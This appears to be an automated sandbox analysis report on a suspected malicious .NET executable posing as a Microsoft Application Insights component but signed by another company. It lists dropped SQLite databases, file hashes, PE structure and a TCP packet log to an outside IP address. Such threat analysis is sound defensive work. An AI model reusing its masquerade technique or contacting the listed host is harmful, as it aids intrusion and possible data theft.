Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\Desktop\7QQ1NYCJ Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\OHLNY58Q Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5495302130315884
Encrypted:	false
SSDEEP:	192:El+bDo3irhnydVj3XBBE3uNBIy7OzlG4oNH:EWU3iVy/BBE3uNBI0olG4oN
MD5:	AC80CECBE5FDA443A75B84589780512A
SHA1:	5EC10058D516D2EDB15005C416DAB6994BDF0E1A
SHA-256:	84F482E5F257AD8D3DE250A6D834A4DC8EF497770D83553A46E93DE89AC6519B
SHA-512:	4A573E33ED4B15ED03FCE4953D0D5EB3488404E88E4FAE8EFB8A900F3437CB86AA419865FF0124832C7305BA69C8174A0424BF4C030039866F742576B56954CD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\XBAIMOPZ Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.690918729230015
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Microsoft.ApplicationInsights.PersistenceChannel.exe
File size:	469480
MD5:	14e351015c5d632f888dbcac03871fae
SHA1:	b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256:	977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
SHA512:	f7ac50b3cc68404ddc14579c9e12239a292afc4e034232274f8987579fbf3ea59a64403e122b946cceec9a383633cb3b7f3eedade819125a017de7c6a48a8947
SSDEEP:	6144:ebzheqatJY9oxu70Y7uh0doi9g9aPmaq/Ox4:O9aJYacQSuhqUaeb/L
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,jFV..............0......&........... ........@.. .......................`......@4....@................................

File Icon


Icon Hash:	e2a6e8b0e8d9d930

Static PE Info

General
Entrypoint:	0x46fdc2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x56466A2C [Fri Nov 13 22:54:36 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	8/17/2021 2:00:00 AM 8/14/2022 1:59:59 AM
Subject Chain	CN=Outer Join Srl, O=Outer Join Srl, L=Zedelgem, C=BE, SERIALNUMBER=0768.928.995, OID.1.3.6.1.4.1.311.60.2.1.3=BE, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	496D903D5FFB2AB64A03EE9BCFA4323B
Thumbprint SHA-1:	15DF03F2D9278D90153F81D5071EAD7BA48697E0
Thumbprint SHA-256:	3EBE83BAEC401EEDBD701081758867A60A2EDD7A59A79C964E84B546D66D0A53
Serial:	068A81AFE2E4F96574749439D8EDB89B

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6fca4	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x2238	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x70600	0x23e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x74000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6fcee	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6ddc8	0x6de00	False	0.366469798777	data	4.53866232943	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x2238	0x2400	False	0.821506076389	data	7.45298688866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x74000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x700e8	0x1c3f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x71d28	0x14	data
RT_VERSION	0x71d3c	0x4fc	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Microsoft. All Rights Reserved.
Assembly Version	0.17.2.179
InternalName	Microsoft.ApplicationInsights.PersistenceChannel.dll
FileVersion	0.17.2.179
CompanyName	Microsoft
Comments	Application Insights SDK Persistence channel
ProductName	Application Insights SDK Windows Persistence channel
ProductVersion	0.17.2.179
FileDescription	Microsoft.ApplicationInsights.Channel.PersistenceChannel
OriginalFilename	Microsoft.ApplicationInsights.PersistenceChannel.dll

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 15:55:33.350672007 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.425278902 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.425386906 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.426397085 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.500878096 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504663944 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504699945 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504724026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504754066 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504780054 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504781008 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504802942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504826069 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504827976 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504853010 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504864931 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504878044 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504901886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504901886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504945040 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579386950 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579421043 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579432964 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579446077 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579458952 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579477072 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579497099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579514027 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579530954 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579556942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579572916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579591036 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579596996 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579607964 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579631090 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579649925 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579670906 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579691887 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579691887 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579710960 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579722881 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579730988 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579749107 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579749107 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579777956 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579826117 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654268026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654303074 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654320002 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654340029 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654360056 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654378891 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654401064 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654422045 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654439926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654453039 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654459000 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654478073 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654496908 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654515028 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654531002 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654534101 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654555082 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654562950 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654575109 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654589891 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654593945 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654613018 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654630899 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654632092 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654650927 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654669046 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654675961 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654710054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654746056 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656788111 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656814098 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656832933 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656852007 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656869888 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656869888 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656888962 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656905890 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656908989 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656929970 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656949997 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656958103 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656969070 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656981945 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656989098 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657008886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657018900 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657027960 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657047033 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657062054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657067060 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657085896 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657088995 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657109022 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657115936 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657128096 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657146931 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657154083 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657191038 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.729645967 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730005980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730036020 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730068922 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730097055 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730125904 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730154991 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730185986 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730212927 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730246067 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730269909 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730300903 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730325937 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730355978 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730382919 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730411053 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730437994 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730467081 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730493069 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730514050 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730525970 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730531931 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730549097 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730561972 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730572939 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730588913 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730612993 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730640888 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730664015 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730684996 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730714083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730740070 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730773926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730804920 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730835915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730860949 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730884075 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730905056 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730910063 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730930090 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730954885 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730956078 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730969906 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730977058 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.730979919 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.730989933 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731000900 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731003046 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731008053 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731012106 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731015921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731019020 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731021881 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731024981 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731035948 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731044054 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731107950 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731199980 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.731611967 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731796980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731823921 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731846094 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731864929 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731887102 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731908083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731933117 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731956005 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731976986 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.731998920 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732019901 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732049942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732078075 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732100010 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732122898 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732146025 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732167006 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732189894 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732211113 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732230902 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732251883 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732273102 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732296944 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732319117 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732337952 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732358932 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732379913 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732399940 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732420921 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732443094 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732466936 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732487917 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732526064 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732553005 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732574940 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732595921 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732626915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.732806921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732831955 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732837915 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732841015 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732844114 CEST	49759	80	192.168.2.4	77.222.42.92
